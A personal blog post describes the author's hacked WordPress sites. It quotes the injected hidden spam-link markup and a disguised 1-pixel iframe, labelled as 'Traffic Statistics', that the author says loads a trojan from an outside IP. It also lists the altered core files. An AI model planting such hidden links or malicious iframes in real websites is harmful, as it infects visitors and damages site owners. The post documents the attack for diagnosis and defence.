My Wordpress Hacked with Hidden Spam Injection
Three of my Wordpress blog hacked, that blogs installed on 2 different servers. I was hit by the spam injection. Spammer(s) injected long hidden links (hundreds of lines!) in blog posts and footer of my HYIP blog for revenue sharing site. Spammer(s) are also inserting iframes in blog posts of my other multi register users blog. That spammer(s) hacked this blog too with inject(s) hidden link of common spam words into footer only ( people can't register at this blog).
Blogs are most likely attacked by some kind of automated tool since the amounts of spam are too big to work manually on all those spam pages creation.
Hidden Text Injection : The insertion was done deliberately to hide the text from display as follows (Injected into blog posts from one of my multi users blog):
-
<font style="overflow: hidden; position: absolute; height: 0pt; width: 0pt">
-
Spam words with link to spam websites
-
</font>
Iframe Injection : my other multi register users blog injected with a 1px iframe due to a vulnerability in WordPress ... looks like this :
-
<!-- Traffic Statistics --> <iframe width="1" height="1" frameborder="0" src="http://xx.xxx.xx.xx/iframe/wp-stats.php"> </iframe><!-- End Traffic Statistics -->
and of course it downloads a trojan. Its happening to a TON of blogs too.
Template Injection : Not only did the hackers insert “invisible” code into my blog posts, what had happened was my template had been hacked so that the footer had included a ton of hidden spam terms.
Number of paragraphs: 1
Number of words: 115,520
Number of letters and digits: 468,439
Number of characters: 595,969
File size: 628,009 bytes
Look like this :
-
<!-- ~ --><u style="display: none"> <a href="http://spammerdomain.ext/spampage.html">ton of spam terms </a> </u><!-- ~ -->
from lower credit card to porn credit card, from buy cheap car insurance to unreal auto car insurance :p
Now, I'm trying to get more information and solve this problem and trying to find the answers for these questions :
Why would someone want to hack my website?
What should I do to detect and eventually block hacking attempts?
What kinds of hackery going on?
How to Prevent SQL Injection Attacks?
How To Repair The Damage?
Search Engine Effects of This Situation
Etc.
I'll be back soon !
Update :
Google temporarily removed some of my webpages from their search results. Currently pages from blog.pramudita.com are scheduled to be removed for at least 30 days. This blog hacked too. Spam terms inserted into footer.php of current theme and user : "wordpress" registered into that blog, also he changed these files :
- index.php
- xmlrpc.php
- wp-trackback.php and
- wp-settings.php
Top incoming search terms for this post
- Beauty and Beautiful: Top 10 Beauty Mistakes Made By Women - November 23rd, 2007
- Calendar: Free 2008 Calendar - November 27th, 2007
- Celebrity: Heidi Montag in Maxim February 2008 - January 18th, 2008
- Computer: List of Best Spyware, Adware, and Malware Removers - April 14th, 2008
- Energy: Water Powered Car Inventors - May 30th, 2008
- Entertainments: Celebrity Fashion Special - March 25th, 2007
- Freebies: List of Best Spyware, Adware, and Malware Removers - April 14th, 2008
- General: Adsense Notifier Firefox Extention - December 14th, 2006
- Google Adsense: Partial Change in Google Adsense Payee Name - March 25th, 2007
- Holiday: Top Christmas Cookies Recipes - December 17th, 2007
- HYIP: When Polexinvest Scam ? - February 13th, 2008
- Operating System: Windows Vista Upgrade Guide - January 31st, 2007
- Scam List: MInvestment - February 6th, 2008
- Security: List of Best Spyware, Adware, and Malware Removers - April 14th, 2008
- SEO: The Effect of PageRank on Search Engine Ranking Position - January 30th, 2007
- Technology: Water Powered Car Inventors - May 30th, 2008
- Web Development: List of Google PageRank 10 Websites - September 14th, 2007
- Windows: Windows Vista Upgrade Guide - January 31st, 2007
- WordPress: My Wordpress Hacked with Hidden Spam Injection - May 12th, 2008

































